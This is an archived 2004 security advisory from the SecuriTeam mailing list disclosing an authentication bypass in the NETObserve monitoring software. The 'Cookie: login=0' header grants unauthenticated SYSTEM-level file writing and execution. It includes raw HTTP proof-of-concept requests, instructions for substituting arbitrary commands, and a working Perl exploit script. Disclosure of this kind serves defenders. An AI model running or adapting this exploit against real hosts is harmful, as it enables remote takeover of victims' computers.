[NT] NETObserve Security Bypass Vulnerability
From: SecuriTeam (support_at_securiteam.com)
Date: 01/01/04
- Previous message: SecuriTeam: "[UNIX] PHPCatalog E-Commerce SQL Injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 1 Jan 2004 12:00:49 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
NETObserve Security Bypass Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://www.exploreanywhere.com/no-intro.php> NETObserve is "your all in
one solution to monitoring spouses, co-workers, children, employee's and
just about any other person you may concerned of that is using your PC!
NETObserve will monitor not only what is going on within your PC, but it
can also record what is going on in front of your PC, with our
breakthrough web cam surveillance technology! With NETObserve on your
side, you will have remote, real-time access to your PC, allowing you to
remotely control and monitor a PC while you are away! Read on to find out
why NETObserve is leading the way in the cutting edge industry of PC
monitoring, surveillance, and administration!".
The product has been found to be very insecure, allowing a remote attacker
(unauthenticated) to create files on the remote computer, run them, view
abitrary files, etc all under the SYSTEM privileges.
DETAILS
Vulnerable systems:
* NETObserve version 2.95.2 and prior
Security Bypass:
NETObserve is extremely persistent when trying to ensure that any remote
user issuing commands to the server is properly authenticated. It seems
that even if the remote user closes his or her browser they are required
to login again before they can gain control of the remote system.
Once a legitimate session with a user has been established, the browser
confirms that the commands that the remote user is issuing are allowed to
be performed on the remote system by sending a special HTTP authentication
header to the NETObserve server.
The only problem with this is the fact that any malicious individuals can
attach the special header directly to their own specially crafted request,
and NETObserve blindly believes that a session with a legitimate user was
already in progress.
The special header in question is nothing more than 'Cookie: login=0'.
Proof of Concept Code:
The following two HTTP requests will execute commands via the windows
command interpreter on the remote system:
REQUEST #1:
--------------------------------------------------------------------------
POST /sendeditfile HTTP/1.1
Accept: */*
Referer: http://127.0.0.1/editfile=?C:\WINDOWS\win.bat?
Content-Type: application/x-www-form-urlencoded
Host: AnyHostWillDo
Content-Length: 25
Cookie: login=0
newfiledata=cmd+%2Fc+calc
--------------------------------------------------------------------------
REQUEST #2:
--------------------------------------------------------------------------
GET /runfile=?C:\windows\win.bat? HTTP/1.1
Accept: */*
Host: AnyHostWillDo
Cookie: login=0
--------------------------------------------------------------------------
To change the commands to be run, just alter the 'Content-Length' of the
first request to be the length of the line of commands, including the
string 'newfiledata='. Then alter the data being posted under
'newfiledata', remembering to replace spaces with '+' and encode any
common HTTP characters, like '/' as hexadecimal values, '%2F' in this
instance.
These specific requests sent unaltered will execute the windows
calculator.
Exploit:
#!/usr/bin/perl
#
# Exploit by SecurITeam
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$request = "POST /sendeditfile HTTP/1.1\r\
Accept: */*\r\
Referer: http://$host/editfile=?C:\\WINNT\\win.bat?\r\
Content-Type: application/x-www-form-urlencoded\r\
Host: $host\r\
Connection: close\r\
Content-Length: 25\r\
Cookie: login=0\r\
\r\
newfiledata=cmd+%2Fc+calc";
print $remote $request;
sleep(1);
$MAXLEN = 256;
if ($remote->recv($newmsg, $MAXLEN))
{
print "Result: $newmsg\n";
}
sleep(1);
close $remote;
#----
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }
$remote->autoflush(1);
$request = "GET /runfile=?C:\\WINNT\\win.bat? HTTP/1.1\r\
Accept: */*\r\
Host: AnyHostWillDo\r\
Cookie: login=0\r\
\r\n";
print $remote $request;
sleep(1);
$MAXLEN = 256;
if ($remote->recv($newmsg, $MAXLEN))
{
print "Result: $newmsg\n";
}
sleep(1);
ADDITIONAL INFORMATION
The original advisory can be found at:
<http://www.elitehaven.net/netobserve.txt>
http://www.elitehaven.net/netobserve.txt.
The information has been provided by <mailto:peter4020@hotmail.com> Peter
Winter-Smith and <mailto:expert@securiteam.com> SecurITeam.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] PHPCatalog E-Commerce SQL Injection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
